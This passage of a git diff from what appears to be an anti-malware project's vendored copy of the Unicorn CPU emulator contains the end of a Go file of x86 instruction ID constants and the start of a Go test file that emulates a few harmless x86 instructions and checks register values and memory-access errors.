X86_INS_RDSEED = 607 + X86_INS_RDTSC = 608 + X86_INS_RDTSCP = 609 + X86_INS_ROL = 610 + X86_INS_ROR = 611 + X86_INS_RORX = 612 + X86_INS_ROUNDPD = 613 + X86_INS_ROUNDPS = 614 + X86_INS_ROUNDSD = 615 + X86_INS_ROUNDSS = 616 + X86_INS_RSM = 617 + X86_INS_RSQRTPS = 618 + X86_INS_RSQRTSS = 619 + X86_INS_SAHF = 620 + X86_INS_SAL = 621 + X86_INS_SALC = 622 + X86_INS_SAR = 623 + X86_INS_SARX = 624 + X86_INS_SBB = 625 + X86_INS_SCASB = 626 + X86_INS_SCASD = 627 + X86_INS_SCASQ = 628 + X86_INS_SCASW = 629 + X86_INS_SETAE = 630 + X86_INS_SETA = 631 + X86_INS_SETBE = 632 + X86_INS_SETB = 633 + X86_INS_SETE = 634 + X86_INS_SETGE = 635 + X86_INS_SETG = 636 + X86_INS_SETLE = 637 + X86_INS_SETL = 638 + X86_INS_SETNE = 639 + X86_INS_SETNO = 640 + X86_INS_SETNP = 641 + X86_INS_SETNS = 642 + X86_INS_SETO = 643 + X86_INS_SETP = 644 + X86_INS_SETS = 645 + X86_INS_SFENCE = 646 + X86_INS_SGDT = 647 + X86_INS_SHA1MSG1 = 648 + X86_INS_SHA1MSG2 = 649 + X86_INS_SHA1NEXTE = 650 + X86_INS_SHA1RNDS4 = 
651 + X86_INS_SHA256MSG1 = 652 + X86_INS_SHA256MSG2 = 653 + X86_INS_SHA256RNDS2 = 654 + X86_INS_SHL = 655 + X86_INS_SHLD = 656 + X86_INS_SHLX = 657 + X86_INS_SHR = 658 + X86_INS_SHRD = 659 + X86_INS_SHRX = 660 + X86_INS_SHUFPD = 661 + X86_INS_SHUFPS = 662 + X86_INS_SIDT = 663 + X86_INS_FSIN = 664 + X86_INS_SKINIT = 665 + X86_INS_SLDT = 666 + X86_INS_SMSW = 667 + X86_INS_SQRTPD = 668 + X86_INS_SQRTPS = 669 + X86_INS_SQRTSD = 670 + X86_INS_SQRTSS = 671 + X86_INS_FSQRT = 672 + X86_INS_STAC = 673 + X86_INS_STC = 674 + X86_INS_STD = 675 + X86_INS_STGI = 676 + X86_INS_STI = 677 + X86_INS_STMXCSR = 678 + X86_INS_STOSB = 679 + X86_INS_STOSD = 680 + X86_INS_STOSQ = 681 + X86_INS_STOSW = 682 + X86_INS_STR = 683 + X86_INS_FST = 684 + X86_INS_FSTP = 685 + X86_INS_FSTPNCE = 686 + X86_INS_FXCH = 687 + X86_INS_SUBPD = 688 + X86_INS_SUBPS = 689 + X86_INS_FSUBR = 690 + X86_INS_FISUBR = 691 + X86_INS_FSUBRP = 692 + X86_INS_SUBSD = 693 + X86_INS_SUBSS = 694 + X86_INS_FSUB = 695 + X86_INS_FISUB = 696 + X86_INS_FSUBP = 697 + X86_INS_SWAPGS = 698 + X86_INS_SYSCALL = 699 + X86_INS_SYSENTER = 700 + X86_INS_SYSEXIT = 701 + X86_INS_SYSRET = 702 + X86_INS_T1MSKC = 703 + X86_INS_TEST = 704 + X86_INS_UD2 = 705 + X86_INS_FTST = 706 + X86_INS_TZCNT = 707 + X86_INS_TZMSK = 708 + X86_INS_FUCOMPI = 709 + X86_INS_FUCOMI = 710 + X86_INS_FUCOMPP = 711 + X86_INS_FUCOMP = 712 + X86_INS_FUCOM = 713 + X86_INS_UD2B = 714 + X86_INS_UNPCKHPD = 715 + X86_INS_UNPCKHPS = 716 + X86_INS_UNPCKLPD = 717 + X86_INS_UNPCKLPS = 718 + X86_INS_VADDPD = 719 + X86_INS_VADDPS = 720 + X86_INS_VADDSD = 721 + X86_INS_VADDSS = 722 + X86_INS_VADDSUBPD = 723 + X86_INS_VADDSUBPS = 724 + X86_INS_VAESDECLAST = 725 + X86_INS_VAESDEC = 726 + X86_INS_VAESENCLAST = 727 + X86_INS_VAESENC = 728 + X86_INS_VAESIMC = 729 + X86_INS_VAESKEYGENASSIST = 730 + X86_INS_VALIGND = 731 + X86_INS_VALIGNQ = 732 + X86_INS_VANDNPD = 733 + X86_INS_VANDNPS = 734 + X86_INS_VANDPD = 735 + X86_INS_VANDPS = 736 + X86_INS_VBLENDMPD = 737 + X86_INS_VBLENDMPS = 
738 + X86_INS_VBLENDPD = 739 + X86_INS_VBLENDPS = 740 + X86_INS_VBLENDVPD = 741 + X86_INS_VBLENDVPS = 742 + X86_INS_VBROADCASTF128 = 743 + X86_INS_VBROADCASTI32X4 = 744 + X86_INS_VBROADCASTI64X4 = 745 + X86_INS_VBROADCASTSD = 746 + X86_INS_VBROADCASTSS = 747 + X86_INS_VCMPPD = 748 + X86_INS_VCMPPS = 749 + X86_INS_VCMPSD = 750 + X86_INS_VCMPSS = 751 + X86_INS_VCOMPRESSPD = 752 + X86_INS_VCOMPRESSPS = 753 + X86_INS_VCVTDQ2PD = 754 + X86_INS_VCVTDQ2PS = 755 + X86_INS_VCVTPD2DQX = 756 + X86_INS_VCVTPD2DQ = 757 + X86_INS_VCVTPD2PSX = 758 + X86_INS_VCVTPD2PS = 759 + X86_INS_VCVTPD2UDQ = 760 + X86_INS_VCVTPH2PS = 761 + X86_INS_VCVTPS2DQ = 762 + X86_INS_VCVTPS2PD = 763 + X86_INS_VCVTPS2PH = 764 + X86_INS_VCVTPS2UDQ = 765 + X86_INS_VCVTSD2SI = 766 + X86_INS_VCVTSD2USI = 767 + X86_INS_VCVTSS2SI = 768 + X86_INS_VCVTSS2USI = 769 + X86_INS_VCVTTPD2DQX = 770 + X86_INS_VCVTTPD2DQ = 771 + X86_INS_VCVTTPD2UDQ = 772 + X86_INS_VCVTTPS2DQ = 773 + X86_INS_VCVTTPS2UDQ = 774 + X86_INS_VCVTUDQ2PD = 775 + X86_INS_VCVTUDQ2PS = 776 + X86_INS_VDIVPD = 777 + X86_INS_VDIVPS = 778 + X86_INS_VDIVSD = 779 + X86_INS_VDIVSS = 780 + X86_INS_VDPPD = 781 + X86_INS_VDPPS = 782 + X86_INS_VERR = 783 + X86_INS_VERW = 784 + X86_INS_VEXP2PD = 785 + X86_INS_VEXP2PS = 786 + X86_INS_VEXPANDPD = 787 + X86_INS_VEXPANDPS = 788 + X86_INS_VEXTRACTF128 = 789 + X86_INS_VEXTRACTF32X4 = 790 + X86_INS_VEXTRACTF64X4 = 791 + X86_INS_VEXTRACTI128 = 792 + X86_INS_VEXTRACTI32X4 = 793 + X86_INS_VEXTRACTI64X4 = 794 + X86_INS_VEXTRACTPS = 795 + X86_INS_VFMADD132PD = 796 + X86_INS_VFMADD132PS = 797 + X86_INS_VFMADDPD = 798 + X86_INS_VFMADD213PD = 799 + X86_INS_VFMADD231PD = 800 + X86_INS_VFMADDPS = 801 + X86_INS_VFMADD213PS = 802 + X86_INS_VFMADD231PS = 803 + X86_INS_VFMADDSD = 804 + X86_INS_VFMADD213SD = 805 + X86_INS_VFMADD132SD = 806 + X86_INS_VFMADD231SD = 807 + X86_INS_VFMADDSS = 808 + X86_INS_VFMADD213SS = 809 + X86_INS_VFMADD132SS = 810 + X86_INS_VFMADD231SS = 811 + X86_INS_VFMADDSUB132PD = 812 + X86_INS_VFMADDSUB132PS = 
813 + X86_INS_VFMADDSUBPD = 814 + X86_INS_VFMADDSUB213PD = 815 + X86_INS_VFMADDSUB231PD = 816 + X86_INS_VFMADDSUBPS = 817 + X86_INS_VFMADDSUB213PS = 818 + X86_INS_VFMADDSUB231PS = 819 + X86_INS_VFMSUB132PD = 820 + X86_INS_VFMSUB132PS = 821 + X86_INS_VFMSUBADD132PD = 822 + X86_INS_VFMSUBADD132PS = 823 + X86_INS_VFMSUBADDPD = 824 + X86_INS_VFMSUBADD213PD = 825 + X86_INS_VFMSUBADD231PD = 826 + X86_INS_VFMSUBADDPS = 827 + X86_INS_VFMSUBADD213PS = 828 + X86_INS_VFMSUBADD231PS = 829 + X86_INS_VFMSUBPD = 830 + X86_INS_VFMSUB213PD = 831 + X86_INS_VFMSUB231PD = 832 + X86_INS_VFMSUBPS = 833 + X86_INS_VFMSUB213PS = 834 + X86_INS_VFMSUB231PS = 835 + X86_INS_VFMSUBSD = 836 + X86_INS_VFMSUB213SD = 837 + X86_INS_VFMSUB132SD = 838 + X86_INS_VFMSUB231SD = 839 + X86_INS_VFMSUBSS = 840 + X86_INS_VFMSUB213SS = 841 + X86_INS_VFMSUB132SS = 842 + X86_INS_VFMSUB231SS = 843 + X86_INS_VFNMADD132PD = 844 + X86_INS_VFNMADD132PS = 845 + X86_INS_VFNMADDPD = 846 + X86_INS_VFNMADD213PD = 847 + X86_INS_VFNMADD231PD = 848 + X86_INS_VFNMADDPS = 849 + X86_INS_VFNMADD213PS = 850 + X86_INS_VFNMADD231PS = 851 + X86_INS_VFNMADDSD = 852 + X86_INS_VFNMADD213SD = 853 + X86_INS_VFNMADD132SD = 854 + X86_INS_VFNMADD231SD = 855 + X86_INS_VFNMADDSS = 856 + X86_INS_VFNMADD213SS = 857 + X86_INS_VFNMADD132SS = 858 + X86_INS_VFNMADD231SS = 859 + X86_INS_VFNMSUB132PD = 860 + X86_INS_VFNMSUB132PS = 861 + X86_INS_VFNMSUBPD = 862 + X86_INS_VFNMSUB213PD = 863 + X86_INS_VFNMSUB231PD = 864 + X86_INS_VFNMSUBPS = 865 + X86_INS_VFNMSUB213PS = 866 + X86_INS_VFNMSUB231PS = 867 + X86_INS_VFNMSUBSD = 868 + X86_INS_VFNMSUB213SD = 869 + X86_INS_VFNMSUB132SD = 870 + X86_INS_VFNMSUB231SD = 871 + X86_INS_VFNMSUBSS = 872 + X86_INS_VFNMSUB213SS = 873 + X86_INS_VFNMSUB132SS = 874 + X86_INS_VFNMSUB231SS = 875 + X86_INS_VFRCZPD = 876 + X86_INS_VFRCZPS = 877 + X86_INS_VFRCZSD = 878 + X86_INS_VFRCZSS = 879 + X86_INS_VORPD = 880 + X86_INS_VORPS = 881 + X86_INS_VXORPD = 882 + X86_INS_VXORPS = 883 + X86_INS_VGATHERDPD = 884 + X86_INS_VGATHERDPS 
= 885 + X86_INS_VGATHERPF0DPD = 886 + X86_INS_VGATHERPF0DPS = 887 + X86_INS_VGATHERPF0QPD = 888 + X86_INS_VGATHERPF0QPS = 889 + X86_INS_VGATHERPF1DPD = 890 + X86_INS_VGATHERPF1DPS = 891 + X86_INS_VGATHERPF1QPD = 892 + X86_INS_VGATHERPF1QPS = 893 + X86_INS_VGATHERQPD = 894 + X86_INS_VGATHERQPS = 895 + X86_INS_VHADDPD = 896 + X86_INS_VHADDPS = 897 + X86_INS_VHSUBPD = 898 + X86_INS_VHSUBPS = 899 + X86_INS_VINSERTF128 = 900 + X86_INS_VINSERTF32X4 = 901 + X86_INS_VINSERTF32X8 = 902 + X86_INS_VINSERTF64X2 = 903 + X86_INS_VINSERTF64X4 = 904 + X86_INS_VINSERTI128 = 905 + X86_INS_VINSERTI32X4 = 906 + X86_INS_VINSERTI32X8 = 907 + X86_INS_VINSERTI64X2 = 908 + X86_INS_VINSERTI64X4 = 909 + X86_INS_VINSERTPS = 910 + X86_INS_VLDDQU = 911 + X86_INS_VLDMXCSR = 912 + X86_INS_VMASKMOVDQU = 913 + X86_INS_VMASKMOVPD = 914 + X86_INS_VMASKMOVPS = 915 + X86_INS_VMAXPD = 916 + X86_INS_VMAXPS = 917 + X86_INS_VMAXSD = 918 + X86_INS_VMAXSS = 919 + X86_INS_VMCALL = 920 + X86_INS_VMCLEAR = 921 + X86_INS_VMFUNC = 922 + X86_INS_VMINPD = 923 + X86_INS_VMINPS = 924 + X86_INS_VMINSD = 925 + X86_INS_VMINSS = 926 + X86_INS_VMLAUNCH = 927 + X86_INS_VMLOAD = 928 + X86_INS_VMMCALL = 929 + X86_INS_VMOVQ = 930 + X86_INS_VMOVDDUP = 931 + X86_INS_VMOVD = 932 + X86_INS_VMOVDQA32 = 933 + X86_INS_VMOVDQA64 = 934 + X86_INS_VMOVDQA = 935 + X86_INS_VMOVDQU16 = 936 + X86_INS_VMOVDQU32 = 937 + X86_INS_VMOVDQU64 = 938 + X86_INS_VMOVDQU8 = 939 + X86_INS_VMOVDQU = 940 + X86_INS_VMOVHLPS = 941 + X86_INS_VMOVHPD = 942 + X86_INS_VMOVHPS = 943 + X86_INS_VMOVLHPS = 944 + X86_INS_VMOVLPD = 945 + X86_INS_VMOVLPS = 946 + X86_INS_VMOVMSKPD = 947 + X86_INS_VMOVMSKPS = 948 + X86_INS_VMOVNTDQA = 949 + X86_INS_VMOVNTDQ = 950 + X86_INS_VMOVNTPD = 951 + X86_INS_VMOVNTPS = 952 + X86_INS_VMOVSD = 953 + X86_INS_VMOVSHDUP = 954 + X86_INS_VMOVSLDUP = 955 + X86_INS_VMOVSS = 956 + X86_INS_VMOVUPD = 957 + X86_INS_VMOVUPS = 958 + X86_INS_VMPSADBW = 959 + X86_INS_VMPTRLD = 960 + X86_INS_VMPTRST = 961 + X86_INS_VMREAD = 962 + X86_INS_VMRESUME = 
963 + X86_INS_VMRUN = 964 + X86_INS_VMSAVE = 965 + X86_INS_VMULPD = 966 + X86_INS_VMULPS = 967 + X86_INS_VMULSD = 968 + X86_INS_VMULSS = 969 + X86_INS_VMWRITE = 970 + X86_INS_VMXOFF = 971 + X86_INS_VMXON = 972 + X86_INS_VPABSB = 973 + X86_INS_VPABSD = 974 + X86_INS_VPABSQ = 975 + X86_INS_VPABSW = 976 + X86_INS_VPACKSSDW = 977 + X86_INS_VPACKSSWB = 978 + X86_INS_VPACKUSDW = 979 + X86_INS_VPACKUSWB = 980 + X86_INS_VPADDB = 981 + X86_INS_VPADDD = 982 + X86_INS_VPADDQ = 983 + X86_INS_VPADDSB = 984 + X86_INS_VPADDSW = 985 + X86_INS_VPADDUSB = 986 + X86_INS_VPADDUSW = 987 + X86_INS_VPADDW = 988 + X86_INS_VPALIGNR = 989 + X86_INS_VPANDD = 990 + X86_INS_VPANDND = 991 + X86_INS_VPANDNQ = 992 + X86_INS_VPANDN = 993 + X86_INS_VPANDQ = 994 + X86_INS_VPAND = 995 + X86_INS_VPAVGB = 996 + X86_INS_VPAVGW = 997 + X86_INS_VPBLENDD = 998 + X86_INS_VPBLENDMB = 999 + X86_INS_VPBLENDMD = 1000 + X86_INS_VPBLENDMQ = 1001 + X86_INS_VPBLENDMW = 1002 + X86_INS_VPBLENDVB = 1003 + X86_INS_VPBLENDW = 1004 + X86_INS_VPBROADCASTB = 1005 + X86_INS_VPBROADCASTD = 1006 + X86_INS_VPBROADCASTMB2Q = 1007 + X86_INS_VPBROADCASTMW2D = 1008 + X86_INS_VPBROADCASTQ = 1009 + X86_INS_VPBROADCASTW = 1010 + X86_INS_VPCLMULQDQ = 1011 + X86_INS_VPCMOV = 1012 + X86_INS_VPCMPB = 1013 + X86_INS_VPCMPD = 1014 + X86_INS_VPCMPEQB = 1015 + X86_INS_VPCMPEQD = 1016 + X86_INS_VPCMPEQQ = 1017 + X86_INS_VPCMPEQW = 1018 + X86_INS_VPCMPESTRI = 1019 + X86_INS_VPCMPESTRM = 1020 + X86_INS_VPCMPGTB = 1021 + X86_INS_VPCMPGTD = 1022 + X86_INS_VPCMPGTQ = 1023 + X86_INS_VPCMPGTW = 1024 + X86_INS_VPCMPISTRI = 1025 + X86_INS_VPCMPISTRM = 1026 + X86_INS_VPCMPQ = 1027 + X86_INS_VPCMPUB = 1028 + X86_INS_VPCMPUD = 1029 + X86_INS_VPCMPUQ = 1030 + X86_INS_VPCMPUW = 1031 + X86_INS_VPCMPW = 1032 + X86_INS_VPCOMB = 1033 + X86_INS_VPCOMD = 1034 + X86_INS_VPCOMPRESSD = 1035 + X86_INS_VPCOMPRESSQ = 1036 + X86_INS_VPCOMQ = 1037 + X86_INS_VPCOMUB = 1038 + X86_INS_VPCOMUD = 1039 + X86_INS_VPCOMUQ = 1040 + X86_INS_VPCOMUW = 1041 + X86_INS_VPCOMW = 1042 
+ X86_INS_VPCONFLICTD = 1043 + X86_INS_VPCONFLICTQ = 1044 + X86_INS_VPERM2F128 = 1045 + X86_INS_VPERM2I128 = 1046 + X86_INS_VPERMD = 1047 + X86_INS_VPERMI2D = 1048 + X86_INS_VPERMI2PD = 1049 + X86_INS_VPERMI2PS = 1050 + X86_INS_VPERMI2Q = 1051 + X86_INS_VPERMIL2PD = 1052 + X86_INS_VPERMIL2PS = 1053 + X86_INS_VPERMILPD = 1054 + X86_INS_VPERMILPS = 1055 + X86_INS_VPERMPD = 1056 + X86_INS_VPERMPS = 1057 + X86_INS_VPERMQ = 1058 + X86_INS_VPERMT2D = 1059 + X86_INS_VPERMT2PD = 1060 + X86_INS_VPERMT2PS = 1061 + X86_INS_VPERMT2Q = 1062 + X86_INS_VPEXPANDD = 1063 + X86_INS_VPEXPANDQ = 1064 + X86_INS_VPEXTRB = 1065 + X86_INS_VPEXTRD = 1066 + X86_INS_VPEXTRQ = 1067 + X86_INS_VPEXTRW = 1068 + X86_INS_VPGATHERDD = 1069 + X86_INS_VPGATHERDQ = 1070 + X86_INS_VPGATHERQD = 1071 + X86_INS_VPGATHERQQ = 1072 + X86_INS_VPHADDBD = 1073 + X86_INS_VPHADDBQ = 1074 + X86_INS_VPHADDBW = 1075 + X86_INS_VPHADDDQ = 1076 + X86_INS_VPHADDD = 1077 + X86_INS_VPHADDSW = 1078 + X86_INS_VPHADDUBD = 1079 + X86_INS_VPHADDUBQ = 1080 + X86_INS_VPHADDUBW = 1081 + X86_INS_VPHADDUDQ = 1082 + X86_INS_VPHADDUWD = 1083 + X86_INS_VPHADDUWQ = 1084 + X86_INS_VPHADDWD = 1085 + X86_INS_VPHADDWQ = 1086 + X86_INS_VPHADDW = 1087 + X86_INS_VPHMINPOSUW = 1088 + X86_INS_VPHSUBBW = 1089 + X86_INS_VPHSUBDQ = 1090 + X86_INS_VPHSUBD = 1091 + X86_INS_VPHSUBSW = 1092 + X86_INS_VPHSUBWD = 1093 + X86_INS_VPHSUBW = 1094 + X86_INS_VPINSRB = 1095 + X86_INS_VPINSRD = 1096 + X86_INS_VPINSRQ = 1097 + X86_INS_VPINSRW = 1098 + X86_INS_VPLZCNTD = 1099 + X86_INS_VPLZCNTQ = 1100 + X86_INS_VPMACSDD = 1101 + X86_INS_VPMACSDQH = 1102 + X86_INS_VPMACSDQL = 1103 + X86_INS_VPMACSSDD = 1104 + X86_INS_VPMACSSDQH = 1105 + X86_INS_VPMACSSDQL = 1106 + X86_INS_VPMACSSWD = 1107 + X86_INS_VPMACSSWW = 1108 + X86_INS_VPMACSWD = 1109 + X86_INS_VPMACSWW = 1110 + X86_INS_VPMADCSSWD = 1111 + X86_INS_VPMADCSWD = 1112 + X86_INS_VPMADDUBSW = 1113 + X86_INS_VPMADDWD = 1114 + X86_INS_VPMASKMOVD = 1115 + X86_INS_VPMASKMOVQ = 1116 + X86_INS_VPMAXSB = 1117 + 
X86_INS_VPMAXSD = 1118 + X86_INS_VPMAXSQ = 1119 + X86_INS_VPMAXSW = 1120 + X86_INS_VPMAXUB = 1121 + X86_INS_VPMAXUD = 1122 + X86_INS_VPMAXUQ = 1123 + X86_INS_VPMAXUW = 1124 + X86_INS_VPMINSB = 1125 + X86_INS_VPMINSD = 1126 + X86_INS_VPMINSQ = 1127 + X86_INS_VPMINSW = 1128 + X86_INS_VPMINUB = 1129 + X86_INS_VPMINUD = 1130 + X86_INS_VPMINUQ = 1131 + X86_INS_VPMINUW = 1132 + X86_INS_VPMOVDB = 1133 + X86_INS_VPMOVDW = 1134 + X86_INS_VPMOVM2B = 1135 + X86_INS_VPMOVM2D = 1136 + X86_INS_VPMOVM2Q = 1137 + X86_INS_VPMOVM2W = 1138 + X86_INS_VPMOVMSKB = 1139 + X86_INS_VPMOVQB = 1140 + X86_INS_VPMOVQD = 1141 + X86_INS_VPMOVQW = 1142 + X86_INS_VPMOVSDB = 1143 + X86_INS_VPMOVSDW = 1144 + X86_INS_VPMOVSQB = 1145 + X86_INS_VPMOVSQD = 1146 + X86_INS_VPMOVSQW = 1147 + X86_INS_VPMOVSXBD = 1148 + X86_INS_VPMOVSXBQ = 1149 + X86_INS_VPMOVSXBW = 1150 + X86_INS_VPMOVSXDQ = 1151 + X86_INS_VPMOVSXWD = 1152 + X86_INS_VPMOVSXWQ = 1153 + X86_INS_VPMOVUSDB = 1154 + X86_INS_VPMOVUSDW = 1155 + X86_INS_VPMOVUSQB = 1156 + X86_INS_VPMOVUSQD = 1157 + X86_INS_VPMOVUSQW = 1158 + X86_INS_VPMOVZXBD = 1159 + X86_INS_VPMOVZXBQ = 1160 + X86_INS_VPMOVZXBW = 1161 + X86_INS_VPMOVZXDQ = 1162 + X86_INS_VPMOVZXWD = 1163 + X86_INS_VPMOVZXWQ = 1164 + X86_INS_VPMULDQ = 1165 + X86_INS_VPMULHRSW = 1166 + X86_INS_VPMULHUW = 1167 + X86_INS_VPMULHW = 1168 + X86_INS_VPMULLD = 1169 + X86_INS_VPMULLQ = 1170 + X86_INS_VPMULLW = 1171 + X86_INS_VPMULUDQ = 1172 + X86_INS_VPORD = 1173 + X86_INS_VPORQ = 1174 + X86_INS_VPOR = 1175 + X86_INS_VPPERM = 1176 + X86_INS_VPROTB = 1177 + X86_INS_VPROTD = 1178 + X86_INS_VPROTQ = 1179 + X86_INS_VPROTW = 1180 + X86_INS_VPSADBW = 1181 + X86_INS_VPSCATTERDD = 1182 + X86_INS_VPSCATTERDQ = 1183 + X86_INS_VPSCATTERQD = 1184 + X86_INS_VPSCATTERQQ = 1185 + X86_INS_VPSHAB = 1186 + X86_INS_VPSHAD = 1187 + X86_INS_VPSHAQ = 1188 + X86_INS_VPSHAW = 1189 + X86_INS_VPSHLB = 1190 + X86_INS_VPSHLD = 1191 + X86_INS_VPSHLQ = 1192 + X86_INS_VPSHLW = 1193 + X86_INS_VPSHUFB = 1194 + X86_INS_VPSHUFD = 1195 + 
X86_INS_VPSHUFHW = 1196 + X86_INS_VPSHUFLW = 1197 + X86_INS_VPSIGNB = 1198 + X86_INS_VPSIGND = 1199 + X86_INS_VPSIGNW = 1200 + X86_INS_VPSLLDQ = 1201 + X86_INS_VPSLLD = 1202 + X86_INS_VPSLLQ = 1203 + X86_INS_VPSLLVD = 1204 + X86_INS_VPSLLVQ = 1205 + X86_INS_VPSLLW = 1206 + X86_INS_VPSRAD = 1207 + X86_INS_VPSRAQ = 1208 + X86_INS_VPSRAVD = 1209 + X86_INS_VPSRAVQ = 1210 + X86_INS_VPSRAW = 1211 + X86_INS_VPSRLDQ = 1212 + X86_INS_VPSRLD = 1213 + X86_INS_VPSRLQ = 1214 + X86_INS_VPSRLVD = 1215 + X86_INS_VPSRLVQ = 1216 + X86_INS_VPSRLW = 1217 + X86_INS_VPSUBB = 1218 + X86_INS_VPSUBD = 1219 + X86_INS_VPSUBQ = 1220 + X86_INS_VPSUBSB = 1221 + X86_INS_VPSUBSW = 1222 + X86_INS_VPSUBUSB = 1223 + X86_INS_VPSUBUSW = 1224 + X86_INS_VPSUBW = 1225 + X86_INS_VPTESTMD = 1226 + X86_INS_VPTESTMQ = 1227 + X86_INS_VPTESTNMD = 1228 + X86_INS_VPTESTNMQ = 1229 + X86_INS_VPTEST = 1230 + X86_INS_VPUNPCKHBW = 1231 + X86_INS_VPUNPCKHDQ = 1232 + X86_INS_VPUNPCKHQDQ = 1233 + X86_INS_VPUNPCKHWD = 1234 + X86_INS_VPUNPCKLBW = 1235 + X86_INS_VPUNPCKLDQ = 1236 + X86_INS_VPUNPCKLQDQ = 1237 + X86_INS_VPUNPCKLWD = 1238 + X86_INS_VPXORD = 1239 + X86_INS_VPXORQ = 1240 + X86_INS_VPXOR = 1241 + X86_INS_VRCP14PD = 1242 + X86_INS_VRCP14PS = 1243 + X86_INS_VRCP14SD = 1244 + X86_INS_VRCP14SS = 1245 + X86_INS_VRCP28PD = 1246 + X86_INS_VRCP28PS = 1247 + X86_INS_VRCP28SD = 1248 + X86_INS_VRCP28SS = 1249 + X86_INS_VRCPPS = 1250 + X86_INS_VRCPSS = 1251 + X86_INS_VRNDSCALEPD = 1252 + X86_INS_VRNDSCALEPS = 1253 + X86_INS_VRNDSCALESD = 1254 + X86_INS_VRNDSCALESS = 1255 + X86_INS_VROUNDPD = 1256 + X86_INS_VROUNDPS = 1257 + X86_INS_VROUNDSD = 1258 + X86_INS_VROUNDSS = 1259 + X86_INS_VRSQRT14PD = 1260 + X86_INS_VRSQRT14PS = 1261 + X86_INS_VRSQRT14SD = 1262 + X86_INS_VRSQRT14SS = 1263 + X86_INS_VRSQRT28PD = 1264 + X86_INS_VRSQRT28PS = 1265 + X86_INS_VRSQRT28SD = 1266 + X86_INS_VRSQRT28SS = 1267 + X86_INS_VRSQRTPS = 1268 + X86_INS_VRSQRTSS = 1269 + X86_INS_VSCATTERDPD = 1270 + X86_INS_VSCATTERDPS = 1271 + 
X86_INS_VSCATTERPF0DPD = 1272 + X86_INS_VSCATTERPF0DPS = 1273 + X86_INS_VSCATTERPF0QPD = 1274 + X86_INS_VSCATTERPF0QPS = 1275 + X86_INS_VSCATTERPF1DPD = 1276 + X86_INS_VSCATTERPF1DPS = 1277 + X86_INS_VSCATTERPF1QPD = 1278 + X86_INS_VSCATTERPF1QPS = 1279 + X86_INS_VSCATTERQPD = 1280 + X86_INS_VSCATTERQPS = 1281 + X86_INS_VSHUFPD = 1282 + X86_INS_VSHUFPS = 1283 + X86_INS_VSQRTPD = 1284 + X86_INS_VSQRTPS = 1285 + X86_INS_VSQRTSD = 1286 + X86_INS_VSQRTSS = 1287 + X86_INS_VSTMXCSR = 1288 + X86_INS_VSUBPD = 1289 + X86_INS_VSUBPS = 1290 + X86_INS_VSUBSD = 1291 + X86_INS_VSUBSS = 1292 + X86_INS_VTESTPD = 1293 + X86_INS_VTESTPS = 1294 + X86_INS_VUNPCKHPD = 1295 + X86_INS_VUNPCKHPS = 1296 + X86_INS_VUNPCKLPD = 1297 + X86_INS_VUNPCKLPS = 1298 + X86_INS_VZEROALL = 1299 + X86_INS_VZEROUPPER = 1300 + X86_INS_WAIT = 1301 + X86_INS_WBINVD = 1302 + X86_INS_WRFSBASE = 1303 + X86_INS_WRGSBASE = 1304 + X86_INS_WRMSR = 1305 + X86_INS_XABORT = 1306 + X86_INS_XACQUIRE = 1307 + X86_INS_XBEGIN = 1308 + X86_INS_XCHG = 1309 + X86_INS_XCRYPTCBC = 1310 + X86_INS_XCRYPTCFB = 1311 + X86_INS_XCRYPTCTR = 1312 + X86_INS_XCRYPTECB = 1313 + X86_INS_XCRYPTOFB = 1314 + X86_INS_XEND = 1315 + X86_INS_XGETBV = 1316 + X86_INS_XLATB = 1317 + X86_INS_XRELEASE = 1318 + X86_INS_XRSTOR = 1319 + X86_INS_XRSTOR64 = 1320 + X86_INS_XRSTORS = 1321 + X86_INS_XRSTORS64 = 1322 + X86_INS_XSAVE = 1323 + X86_INS_XSAVE64 = 1324 + X86_INS_XSAVEC = 1325 + X86_INS_XSAVEC64 = 1326 + X86_INS_XSAVEOPT = 1327 + X86_INS_XSAVEOPT64 = 1328 + X86_INS_XSAVES = 1329 + X86_INS_XSAVES64 = 1330 + X86_INS_XSETBV = 1331 + X86_INS_XSHA1 = 1332 + X86_INS_XSHA256 = 1333 + X86_INS_XSTORE = 1334 + X86_INS_XTEST = 1335 + X86_INS_FDISI8087_NOP = 1336 + X86_INS_FENI8087_NOP = 1337 + X86_INS_ENDING = 1338 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_test.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_test.go new file mode 100644 index 0000000..803c646 --- /dev/null 
+++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_test.go @@ -0,0 +1,185 @@ +package unicorn + +import ( + "testing" +) + +var ADDRESS uint64 = 0x1000000 + +func MakeUc(mode int, code string) (Unicorn, error) { + mu, err := NewUnicorn(ARCH_X86, mode) + if err != nil { + return nil, err + } + if err := mu.MemMap(ADDRESS, 2*1024*1024); err != nil { + return nil, err + } + if err := mu.MemWrite(ADDRESS, []byte(code)); err != nil { + return nil, err + } + if err := mu.RegWrite(X86_REG_ECX, 0x1234); err != nil { + return nil, err + } + if err := mu.RegWrite(X86_REG_EDX, 0x7890); err != nil { + return nil, err + } + return mu, nil +} + +func TestX86(t *testing.T) { + code := "\x41\x4a" + mu, err := MakeUc(MODE_32, code) + if err != nil { + t.Fatal(err) + } + if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { + t.Fatal(err) + } + ecx, _ := mu.RegRead(X86_REG_ECX) + edx, _ := mu.RegRead(X86_REG_EDX) + if ecx != 0x1235 || edx != 0x788f { + t.Fatal("Bad register values.") + } +} + +func TestX86InvalidRead(t *testing.T) { + code := "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" + mu, err := MakeUc(MODE_32, code) + if err != nil { + t.Fatal(err) + } + err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) + if err.(UcError) != ERR_READ_UNMAPPED { + t.Fatal("Expected ERR_READ_INVALID") + } + ecx, _ := mu.RegRead(X86_REG_ECX) + edx, _ := mu.RegRead(X86_REG_EDX) + if ecx != 0x1234 || edx != 0x7890 { + t.Fatal("Bad register values.") + } +} + +func TestX86InvalidWrite(t *testing.T) { + code := "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" + mu, err := MakeUc(MODE_32, code) + if err != nil { + t.Fatal(err) + } + err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) + if err.(UcError) != ERR_WRITE_UNMAPPED { + t.Fatal("Expected ERR_WRITE_INVALID") + } + ecx, _ := mu.RegRead(X86_REG_ECX) + edx, _ := mu.RegRead(X86_REG_EDX) + if ecx != 0x1234 || edx != 0x7890 